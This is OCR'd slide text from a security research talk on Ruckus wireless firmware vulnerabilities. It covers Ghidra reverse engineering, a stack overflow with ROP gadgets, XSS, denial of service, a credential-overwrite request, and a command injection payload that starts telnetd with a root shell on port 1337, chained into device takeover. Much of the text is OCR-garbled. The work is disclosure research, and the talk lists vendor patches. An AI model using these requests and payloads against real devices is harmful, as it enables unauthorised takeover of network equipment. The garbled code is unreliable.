Dont Ruck Us Again 


The Exploit Returns 


Weird stuff 


rkscli: ruckus rkscli: ruckus rkscli: ruck’ 
uff wuff au bau ruff 


rkscli: 1v541 
hat's your chow: 


b bl « 3020/4839 


echo $USER 


ə Gal Zror - @waveburst 


e Security research leader at Aleph Research by HCL AppScan 


e 10+ RE, Odays, Exploits, embedded Linux devices 


N Aleph Research 
HCL AppScan 


Recap 


e Credential leakages + SSH jailbreak 


e Unauth stack buffer overflow 


e Command injection + Auth bypass 


R510 Unleashed 


e AP: C110, E510, H320, H510, M510, R310, R500, R510 R600, R610, R710, 
R720, T300, T301n, T310d, T610, T710 


e ZoneDirector line 


e Unleashed Firmware <= (200.7.10.102.92) 


What's New? 


e Patch did not fix all vulnerabilities 


e Now I own a device 


e New Ghidra script 


Previous scrip 


Data 


"[DEBUG] id(0x%08x) - %s(): FM auth ok\n" 


"[ERROR] id(0x%08x) - %s(): Syntax Error, expected: AuthFM(password, is_adm... 


"[DEBUG] id(0x%08x) - %s(): logout admin, del credentialin” 


"[DEBUG] id(0x%08x) - %s(): cid is nullin" 
"[INFO ] id(0x%08x) - %s(): cid is nullin” 


"[ERROR] id(0x%08x) - %s(): Syntax Error, expected: 
"[ERROR] id(0x%08x) - %s(): Syntax Error, expected: AuthAdmin(cid, username... 


LogoutAdmin(session id, i... 


"[ERROR] id(0x%08x) - 9es(): %s(not peer ZD) tried to access cluster stuffs\n" 


"[ERROR] id(0x%08x) - %s(): Syntax Error, expected: 
"[ERROR] id(0x%08x) - %s(): Syntax Error, expected: 
"[ERROR] id(0x%08x) - %s(): Syntax Error, expected: 
"[ERROR] id(0x%08x) - %s(): Syntax Error, expected: 
"[ERROR] id(0x%08x) - %s(): Syntax Error, expected: 


"[DEBUG] id(0x%08x) - %s(): ua=%s\n" 


Cluster(action, value)\n" 
Cluster(action[, value])\n" 


GetSysinfoltype, filename... 
FmTemplate(action, file)\n" 
UserAgentCheck(headers[... 


"[WARN ] id(0x%08x) - %s(): unable to handle user-agent: %sin" 

"[DEBUG] id(0x%08x) - %s(): Mac OS Verion = %d_%d\n" 

"[DEBUG] id(0x%08x) - 96s(): —— Linux“ y" 

"[ERROR] id(0x%08x) - %s(): UrlCheck it is XSS risk, redirect to %s, query %s\n" 
"[ERROR] id(0x%08x) - %s(): Check register result for cid[%s] failed.\n" 
"[ERROR] id(0x%08x) - %s(): Register guestsvc[%s] with Facebook failed.\n" 
"[ERRORI id(0x%08x) - %s(); The maxmum of Facebook WiFi profile is %d.\n" 


| Location |T. P | Size 


001afe60 
OOlafddo 
001afd44 
OOlafcc8 
001afc94 
001afc20 
001afa3c 
001af950 
001af8c4 
001af818 
001af6fc 

001af500 
001af450 
001af3e0 
001af390 
001af31c 
001af284 
001af118 
00 laeffc 

00laef4c 
001aeea8 


string 
string 
string 
string 
string 
string 
string 
string 
string 
string 
string 
string 
string 
string 
string 
string 
string 
string 
string 
string 
strina 


: Decompile: [ 


undefined + getZDDI 


L 
bool bVarl; 
undefined *puVar2; 
int ıVar3; 

_ pid t Var4; 
uint uVar5; 
undefined *puVar6; 


puVar2 = (undefined *)getNonLocalizedString("DOMAIN NAME"); 
iVar3 = logGetFacility(); 
if Ford = 1) Į 
(bVar1) í 
ar = puVar2; 
if (puVar2 = x *)0x0) ( 
puVar6 = &DAT 001ab198, 
) 


intf("[DEBUG] id(0x%08x) - %s(): ZD Domain Name: %s\n",0x1000040, MMA. bierg: 


mne 
E 
return puVar2; 


New script 


if ((mpr = mprCreate(0, NULL, NULL)) == 0) { 
mprError(mpr, "Can't create the web server runtime"); 
return 0; 

) 

if (mprStart(mpr, 0) < 0) { 
mprError(mpr, "Can't start the web server runtime"); 


return 0; 

) 

http = maCreateHttp(mpr); 

if ((server = maCreateServer(http, configFile, NULL, NULL, -1)) == 0) I 
mprError(mpr, "Can't create the web server"); 
return 0; 


kal ` kel ` kel ` kel ` ke ` kel ` kel 


Script output 


{ 


undefined4 * FUN 00014f38(undefined4 param 1) 


undefined4 uVarl; 
uid t _Var2; 
passwd *ppYar3; 
gid t Var4; 
group *pgVar5; 
undefined4 *puVar6; 


uVarl = FUN 000b92e4(param l,OxaO,&L4B 00015150); 
puVar6 = (undefined4 *JFUN-00069140(uVarl "server. ISS); 
if (puVar6 == (undefined4 *)0x0) { 

puvar6 = (undefined4 *)0x0; 


} 


Unknown code Embedthis code 


pk ra maCreateHttp maCreateServer 


209 


(powiecie gi mprError 


rks_registerEspExtension . 


FUN 000130b8 FUN 000924f0 FUN 000c351c 


mprCreate 


rks FUN 00010b78 


Ruckus code 


Ghidra script - ReplaceFuncNameFromSource 


e github.com/alephsecurity/general-research-tools 


po 
(A 
D 


“€ 


First Attack Scenario 
> 
yn 


4 


Demo Time! 


Web interface 


e /bin/webs 


e /bin/emfd 


e /usr/lib/libemf.so 


Web interface 


/bin/webs . ejs handler _ 


[Es] Binary 
m Handler 


Shell Exection 


| Mapping Logic 


/bin/emfd 


func_namel ptr_namel 
func_name2 ptr_name2 


func_name name3 func names — ptr name | name3 


/usr/lib/libemf.so 


Aisys_wrapper.sh—>shell execution 


/lib/libc.so 


void|rks |registerEspExtension (int param 1) 


m. 


DAT 001106b0 - param 1, 

rks RegisterFuction (param 1, "S" İrks b): 

rks RegisterFuction(DAT 001106bC esl $ 

rks_RegisterFuction (D/ 60110650,” | EAT capeJS); 

rks RegisterFuction (DA 60110650, "Escape JSt [rk _EscapeJStr); 

rks RegisterFuction(DAT 001106b0, "Now" sai 

rks RegisterFuction (DA YNO'R, Baia ap PspDelegate); 

rks RegisterFuction (DAT 001106k spDelegateAsyn); 

rks RegisterFuction (DAT 001106 10, »spGetCooki ieValue); 
rks RegisterFuction (DA 00110650, ^ 

rks RegisterFuction(DAT 001106b0,' | 

rks_RegisterFuction (DAT_001106b0, "OauthC Įrks pspOauthCheckToken); 
rks RegisterFuction (DAT 001106b0 ,"HTML2Escape"[ rks İHTML2Escape): 

rks extensionInit(DAT 001106 b0); 

return; 


Web interface - /bin/webs 
> web wget 192.168.0.1/admin/webPage/wifiNetwork/wlanSysConfirm.jsp 


> web cat ./admin/webPage/wifiNetwork/wlanSysConfirm.jsp 
<% T : 


old rks registerEspExtension(int param 1) 


var aeFlag -jEscapeJStr(params["flag"]); 
var content = params["contentKey"] 

content = content || NUN SendEmailOrSMS"; 
var showCancel - params : ua eko "Str". rl 
%> å Tr hp "Escape JS 
<div style="width:750px;margin-top:50px; EIER cha m. ae 
id="wlanSysConfirm"> 


106b0 = param 1; 
terFuction(param 1]"S" ¿rks 
4 à; Z ap». 7” | " 


id="close wlansysconfirm">&times;< 
<div class="head title"> 
<p style="line-height:30px;paddirg:5% 0;"><%S(content);%></p> 
<div class="button_box"> 
<input type="button" value="<%S(''Yes")%>" class-"ok" id-"sysconfirm_yes"> 
<input type="button" style="display:<%=showCancel?'':'none'%>" value="<%S( "No" )%>" 
class="cancel" id="sysconfirm_no"> 
</div> 
</div> 


Unsafe string copy 


void rks registerEspExtension(int 


return: 


param 1) 


10 ri “RegisterFuction (b 001106b0, "Now", rks % 

LI ri illo YNN EET De lege 

12 rks Jist | AT 001106b0, "DelegateAsyn" , 5-6 espDelegateAsyn); 

1 rks jis Mp GetCookieValue",rks_espGetCookieValue); 

1 rks Rees å | IE spe =< i me mg 

15 r! Jis 9, Print",rks espPrint); 

1 rks jisterFuctiomeal ( "DO, "OauthCheckToken", rks_espOauthChe ken); 
17 rks ReqisterFuctfon (OM ` (65710650, HTMEZEsCape ” "TKS HTMLZESTape): 


18 rks extensionInit (DAT _001106b0); 


Grep it 


3 web grep -nr 205 SEC “find . -iname "*.jsp"' 
11:<p style-"line-height:30px; 
padding: 5% 0; "><XS (content) 3%></p> 
19: <%S(err msg);%> 


wlanSysConfirm.jsp 


> web cat ./admin/webPage/wifiNetwork/wlanSysConfirm.jsp 
<% 


var aeFlag = EscapeJStr(params["flag"]); 
var content = params["contentKey"] (x. 
content = content || "UN SendEmai LO 
var showCancel = params["showCancel® 
%> Ñ 
<div style="width:750px;margin-top:50pNW 
id="wlanSysConfirm"> = 
<s class="close tag" style="display:<%=showCancel?'':'none'%>" 
id="close wlansysconfirm">&times;</s> 
<div class="head title"> A 
<p style="line-height:30px; padding: 54 0;"><%S(content);%></p> | 
<div class="button box"> < ` ` 4 
<input type="button" value="<%S( "Yes" )%>" class="f NE 
<input type="button" style="display :<%=showCance Ne 
class="cancel" id="sysconfirm no"> 
</div> 
</div> 
<script> 
var ae flag = '<%=aeFlag%>'; 
</script> 


es "> 
%S( " No" )%>" 


Smashing 


1 POST /admin/webPage/wifiNetwork/wlanSysConfirm.jsp HTTP/1.1 

2 Host: 192.168.0.1 

3 Content-Type: applıcatıon/x-www-form-urlencoded charset=UTF-8 
! Content-Length: 2948 


flag=b&contentKey=a....[a*2928]...a 


Exploitation 


1 POSI /admın/webPage/wırıNetwork/wlanSysConfırm.]sp HITP/1.1 

2 Host: 192.168.0.1 

3 Content-Type: application/x-www-form-urlencoded charset=UTF-8 
4 Content-Length: 2990 


Gadget 1 - sub sp, fp, #0x14 ; pop11r4, r5, r6, r7, fp, pc} 
Gadget 2 - mov rO, r4 ; pop/{r4, pc} 


Call System() 


Other Attacks 


Other vulnerabilities found 


e XSS 


e DOS 


e İnfo leak -> jailbreak 


Cross-Site Scripting 


1 POST /admin/ wla cmdstat.jsp HTTP/1.1 
2 Content-Type: application/x-www-form-urlencoded charset=UTF-8 
3 Content-Length: 124 

Connection: close 


-—s.1..-—.la 


POST /admın/ wla cmdstat.jsp HTTP/1.1 
Content-Type: application/x-www-form-urlencoded charset=UTF-8 

3 Content-Length: 190 

| Connection: close 

HTTP/1.1 200 ( = 

Date: Fri, 15 6 <ajax-reguest action='docmd' updater=""> 

Server: Embed: 7 <a xmlns:a-"http://www.w3.0rg/1999/xhtml"»«a:body onload="alert(1)"/></a> 
X-Frame-Optıoı g comp='system'> 


pe modiis qu as au RD $ . ul aras 2s - 2 a 
oc. 


5 <ajax-request 
<xcmd cmd='get- _ 
g </ajax-reguest> 


<!--' 


Cache-Control < 
Content-Lengtlic 
Connection: clo 
Content-type: 


«xcmd cmd='get-security-email-hint'/> 
</ajax-request> 

se 

text/xml 


X-Appweb-Seq: 46 


<!DOCTYPE ajax-response><a]ax-response> 


118 <?xml version="1.0" encoding-"utf-8" 
«response type="object" 1d="!!!Chookity!!!"><failure code=" 
UN E FailSecurityInfoWrongEmail" /></response></ajax-response> 


Denial of Service 


1 POST / HTTP/1.1 


2 Content-Type: multipart/form-data; boundary=abc 
3 Content-Length: 68 


5 --abc 
6 Content-Disposition:; name="text123" 


3 text default 
3 --abc-- 


Information Leakage 


<root xmlns="urn:schemas-upnp-org:device-1-0"> 
<specVersion> 
<major>1</major> 
<minor>0</minor> 
</specversion> 
<URLBase>http://192.168.0.1/</URLBase> 
<device> 
<deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType> 
<friendlyName>Ruckus-Unleashed 192.168.0.1</friendlyName> 
<manufacturer>Ruckus Wireless</manufacturer> 
<manufacturerURL>http://www.ruckuswireless.com</manufacturerURL> 
<modelDescription>Ruckus Wireless Unleashed</modelDescription> 
<modelName>R510</modelName> 
<modelNumber>200.7.10.2</modelNumber> 
<modelURL>http://www.ruckuswireless Sgom/</modelURL> 
<serialNumber>161902007765</seria gi 
<UDN>uuid:edb18e23-0 | 
<UPC>unknown</UPC> 
<iconList> 
<icon> 
<mimetype>image/g 
<width>32</width> 
<height>32</height> 
<depth>8</depth> 


` 
N 


Command injection 


000ae590 
000af6f0 

000b6d60 
000b727c 


/binAwebs ejs handler 


———443—p 


—80—7 


= Binary 
Handler 


Shell Exection 


m Mapping Logic 


system cmdSpectraAnalysis 
system cmdPacketCapture 
system cmdimportCategory 
system cmdimportAvpPort a», 


jsa-> Deleage(func_name) 


| fj Functions 8 iten 


Label = E Location 


execl 
execSysCmdlmpl 
execv 

execvp 

popen 
popenSysCmdimpl 
preadSysCmdimpl 
system 


/bin/emfd 


func name1 


m> ptr namel 


func name2 


=> ptr name2 


func name3 


>> ptr name3 


func name4 


>| ptr named 


| Reference Count | 


0001186c 
00011ba8 
00011080 
00011ed8 
00011e48 
00010fcc 
00011020 
00010a98f 


lusrllib/tibemt.so| 


bin/sys wrapper.sh—>shell execution 


/lib/libc.so 


Command injection 
POST /admin/ cmdstat. jsp|HTTP/1.] 


Content-type: app LG 

X-CSRF-Token: oa. 

Content-Length: 21 SEX q ka 
Cookie: -ejs-session- IS j /5942005c785bac52 ` S 


<ajax-request action='doch_/xcmd='impS 3 > z 'system'> 
<xcmd cmd='import-avpport' uploadFile ></ajax-request> 


snprintf( 
system( L 
| 3 /etW /spider/uploaded/avpport 
snprintf( OXO, "ln -fs %s %s","/etc/airespider/uploa 


-espider/up 


system( 


Patched command injection 


' |undefined4 cmdImportAvpPort(char “param 1) 


d 


| | = XGetAttrString(param 1, 
L = is validate input string(u 

if (1 | == O) í — 
memset (command, 0, 0x100): 
snprintf (command, 0x100, "cp SN 
“ə A) 

c/alres pider; /uploaded/ avpport file"; 

rt mand, 0x100, "İn -fs $s $s","/etc /alres p r/uploadavpport file" 

+ ate) 
system( medi; 
Local = fopen(uploadFile,"r"); 


is validate input string() 


undefined4 is validate input string(char *param 1) 


{ 
size t sVarl; 
char *pcVar2; 
int local c; 


if (param 1 != (char *)0x0) I 
sVarl = strlen(param 1); 
local c = 0; 
while (local c < (int)sVarl) { 

peVar2 = strchrK"$;&()|<>N'N" 
if (pcVar2 != (char *)0x0) 4 
return Oxffffffff; 
} 
local c = local c +1; 
} 

} 

return 0; 

} 


‘| (uint) (byte)param 111ocal c1): 


` Y A — — — s xu 


2 


Dollar sing 
Semicolon 
Ampersand 
Left parenthesis 
Right parenthesis 
Vertical bar 
Less-than sign 
Greater-than sign 
Single guote 
Double guote 
Backtick 
Backslash 
Space 


Spot the Characters 


| 
| 
||) titi 
|| 
Mt 


Ie: 


> de 


— 
— 
— 

— 
E 

— 
— 

— — 

—  — > 

o n_a 
m 
— > ` 
— <> 
— mm 
D 
— — 
— — 
—  —@ 
— 
2x—f5. 
— — 
— o 
5 7—. 


Shebang 


Previous Command Injection 


1 POST /admin/ cmdstat.jsp HTTP/1.1 

2 Content-Type: application/x-www-form-urlencoded charset= 
3 X-CSRF-Token: oaMM8EBv1Y = 
4 Cookie: -ejs-session-=x236a14bd195e0f136942005c785bac52 

5 Content-Length: 223 


er='system.1568118269965.3208' comp='system'> 
type="wlan-maxnums ' /> 


1 POST /admin/ cmdstš 
? Content-Type: application/xA /rm-urlencqded charset=4TF-8 
3 X-CSRF-Token: oaMM8EBv1Y ñ 
Cookie: -ejs-session--x236al4bd195e0f136942005c785bac52 
5 Content- Landi 225 
st action-'docmd' xcmd-'get-platWbrm-depends' üğdater-" syEtem.1568118269965.3208" comp='system'> 


egue ( 


cmd=" import- avpport' uploadFile="|!/bin/shynftelnetdkit| L/bin/shit|pl337' typez "vlan-maxnums" /> 


system.xml 


password-"1234abcd" 


au t Z 


b 
ikus-Unleashed" domain="" /> 
abled="false" security-email="" security; 


ae" encrypted-"false" /> 
(eo | ntp1="ntp. Re 
^ "" ipv6-dns1="" ipv6-dns2- 
fe" vlan-id-"" /> 


“X-password-"2345bcde" auth-token; 
"192.168.0.1" netmask="25% 
Lun netmask="" gateway="" enak 
useip6="false" peer-ip="" passwo\ 


Wuthsvr-id="0" fallback-locz” 
ins2="" by-ipv6-auto="true"\ 
."" vlan-id="1" /> 
A ende 00 VA 


s 


Credentials overwrite 


ccessCheck (undefined4 param 1,undefined4 param 2) 


| bVar5 = false; 
25 |LAB 0005d9fc: 
if (bVar5) 4 
uVar2 = FUN 0007a59c (param 1); 
_ 82 = (char *)_loadXmlStr(uVar2); 
logXdataImpl(0x1000040, 52); 
attr action = xGetAttrString( s2,"action",""); 
iVarl = strcasecmp(attr_action, "setconf") 
if (iVar1:— 8) I 
iVarl = xGetChild( s2,"admin") 
if (ivarl = 0) { 
printf(" [ERROR] id(0x%08x) - %s() 
"WithoutLoginAccessCheck"); 


} 
else { 


1 OC al å 


iVarl = strcasecmp(attr action,"docnd' MW” 
if (ivarl == 0) { 
iVarl = xGetChild( s2,"xcmd"); 


CheckResetCredentialConfPara 


2 |undefined4 CheckResetCredentialConfPara(undefined4 param 1) 


1 
apcStack60[0] = "username"; 
apcStack60[1] = "fallback-local'k 
apcStack60[2] = "authsvr-id"; 
apcStack60[3] = "auth-by"; 
peStack44 = "x-password"; 
pcStack40 = "IS PARTIAL"; 
pcStack36 = "reset"; 
pcStack32 = "auth-token"; 
local_c = 0; 
local_10 
local_14 = 
attr num 
1f (attr_ 

local_c = 0; 
while (local c < local 14) Į 
local lc = apcStack60[local c] 
iVarl = xAttrExistsínaram 1,locå 
if (iVarl != 0) { 
printf(" ice ` 
"Check 


hitted\n", 0x1000040, 


} 
local_10 = local_10 + 
} 


local_c = local_c +1; 


Ajax Request 


POST /admin/ wla conf.jsp HTTP/1.1 

Content-Type: applıcatıon/x-www-form-urlencoded charset=UTF-8 
3 Content-Length: 248 
| Connection: close 


<ajax-request action='setconf' updater='acl-list.1579433244273.4243' comp='system'> 

7 <admin username="admin" x-password="1234" auth-token="" reset=true IS PARTIAL="" auth-by="local" 
authsvr-id='0 fallback-local="tr)a" /> A Å 

8 </ajax-requesty N || 


2 A 


th- token"; == am 


AjaxConf 


localAddObj registerHandlers 


v 


username="super" x-password="tq.benjo" privilege="rw" idletimeout="30" 
lang="en US" auth-by="local" authsvr-id="0" fallback-local="true" 
name="Ruckus-Unleashed" domain="" 

- enabled="false" security-email="" security-question="" 


security- 
answer="" customized="false" encrypted="false" 


acl-list.1579433244273.4243' ='system'> 
<admin username="admin" x-password="1234" auth-token="" reset=true IS_PARTIAL="" auth-by="local" 


authsvr-id-'0' fallback-local-"true" /> 


</ajax-reguest> 
adapter setConf 


adapter setConf 


L POST /admin/ wla conf.jsp HTTP/1.1 

2 Content-Type: application/x-www-form-urlencoded charset-UTF-8 
3 Content-Length: 248 

| Connection: close 


<ajax-request action="setcont" updater="act-Llist.1579433244273.4243"' "Tomp="system > T T ^ ^ 

7 «admin username="admin" x-password="1234" auth-token="" reset-true RTIA auth-by="local" 
authsvr-ıd='0' fallback-local="true" /> 
</a]ax-request> 


int adapter_setConf (char *attr_comp,char *req_xml) 


adapter validateConf(req xml); 
== 0) I 
strcmp(attr comp,"system"); 
rd == 0) 1 
= xGetChild(req xml," 
= xAttrExists( 
l> 0) í | ə 
7 = xGetConfImpl("adapter setCon /, "country-list",0); 
2 = (char *)xGetAttrString(u + ; 
local = xGetFirstChild(uVar7); 
while ( .18 != 0) I 


Slash!!! 


POST /admin/ wla conf.jsp HTTP/1.1 
2 Content-Type: application/x-www-form-urlencoded charset=UTF-8 
3 Content-Length: 239 

4 Connection: close 


System" > 


6 «ajax-request action-'setconf' updater='acl-list.1579433244273.4243' A Of p= 4 è 
3 pay? e uth-by="local" 


ac ame="admın" x-password="1234" auth-token="" reset=true IS_PARTIAL p= 
authsvr-id-'0' fallback-local="true" /> 


2 lint repoGetCurchild(char *comp,char *child,bool get deafult) 


Lr 


—— 
p_Varl = (_pool *)new_ po ol 0: p 


10 pcVar2 = (char *)ps printf(p Varl,"%s/al 
11 local_c = _repoGetCache ("Current"7p Vart, 
12| if (local_c == 0) 1 / 
13 if (child == (char *)0x0) 4 < 
14 local_c = repoGetBackup (comp); 

5 } 
6 if (local_c == 0) { 

17 if (get FY == false) ( 


Overwrite 


ruckus$ cat /writable/etc/airespider/system.xml 


<system> 
<admin-threshold /> 
= = Sidentity _name="Ruckus-Unleashed'_domain=" [> 4 = = = = = = = EEE 


«admin username="admin" x-password="Mfoobs" auth-token="" reset="tNye" IS PARTIAL="I 


` 
mm = = = = E = = = ` em = = = = = = = = — - == == == == ` mmm 


<credential-reset enabled="false" security-email= 
answer="" customized="false" encrypted="false" /> 
<internal is-factory="false" default-login="admin" 


49" redirect 
ENS Arect-policy6- 
id="1" guest-policy6-id="2" system-mesh-id="1" stp="disable" "enable" /> 
<time by-ntp="true" time="0" ntpi="ntp.ruckuswireless.com" mezone="GMT" /> 
<mgmt-ip by-dhcp="true" ip="192.168.0.1" netmask="255.255.255.0” 
gateway="192.168.0.1" dns1="" dns2="" by-ipv6-auto="true" ipv6="fc00::2" 
prefixlength="64" ipv6-gateway="" ipv6-dns1="" ipv6-dns2="" ipmode="1" /> 
<addif enabled="false" ip="" netmask="" gateway="" enabled-ipv6="false" ipv6= 
prefixlength="" ipv6-gateway="" vlan-id="1" /> 
<mgmt-vlan enabled="false" vlan-id="" /> 
<cluster enabled="false" useip6="false" peer-ip="" password="" /> 
<dhcps enabled="false" ip-start="" ip-end="" option-60-value="Ruckus CPE" range="0" 
netmask="255.255.0.0" lease="" /> 


Chaining + Footprinting 


1 POST /admin/_wla_conf.jsp HTTP/1.1 
2 Content-Type: application/x-www-form-urlencoded charset=UTF-8 
3 Content-Length: 239 


4 Connection: close 
6 <ajax-request action-'setconf' updater-"acl-lıst.1579433244273.4243" comp-'/system'> 
7 <admin username="admin" x-password="1234" auth-token="" reset=true IS PARTIAL="" auth-by="local" 
authsvr-1d="0" fa uckus$ grep -A1 "all powerful /var/run/rpmkey* 
3 </ajax-reguest> /var/run/rpmkey22:a11 powerful login name 
/var/run/rpmkey22-admin 
POST /admin/ ——w./var/run/rpmkey22:all powerful login på 
m / var /run/rpmkey22-Lennar e 


? Content-Type: appli 
3 X-CSRF-Token: oaMM8EBvlY 
| Cookie: -ejs-session--x236a14bd195e0f136942005c 
5 Content-Length: 225 


7 <ajax-request action-'docmd' xcmd='get-platform-depend®4pdater='system.1568118269965.3208' comp='system'> 
3 excmd cmd='import-avpport' uploadFile='#!/bin/sh\ntelnetd\t-l1/bin/sh\t-p1337' type='wlan-maxnums'/> 
9 </ajax-request> 


Demo Time #2 ya 


Product Vulnerable Release Resolution Patch Release Date 


9.9 and before Upgrade to 9.10.2.0.84 or newer (*) N/A 

9.10.x Upgrade to 9.10.2.0.114 May 29, 2020 

9.12.x Upgrade to 9.12.3.0.154 May 15, 2020 

9.13.x, 10.0.x Upgrade to 10.0.1.0.123 May 21, 2020 
ZoneDirector 10.0.x Upgrade to 10.0.1.0.123 May 21, 2020 


10.1.x Upgrade to 10.1.2.0.306 May 10, 2020 
10.2.x Upgrade to 10.2.1.0.183 May 15, 2020 
10.3.x Upgrade to 10.3.1.0.42 May 26, 2020 
10.4.0 Upgrade to 10.4.0.0.98 May 26, 2020 
200.6 and before Upgrade to 200.7.10.202.118 Jun 1, 2020 
Unleashed 200.7 Upgrade to 200.7.10.202.118 Jun 1, 2020 


200.8 Upgrade to 200.8.10.3.278 ay 30, 2020 
V 


Final thoughts 


e Research = Fun 


e Follow-up research = More Fun 


e Blog post at alephsecurity.com 


Thanks 
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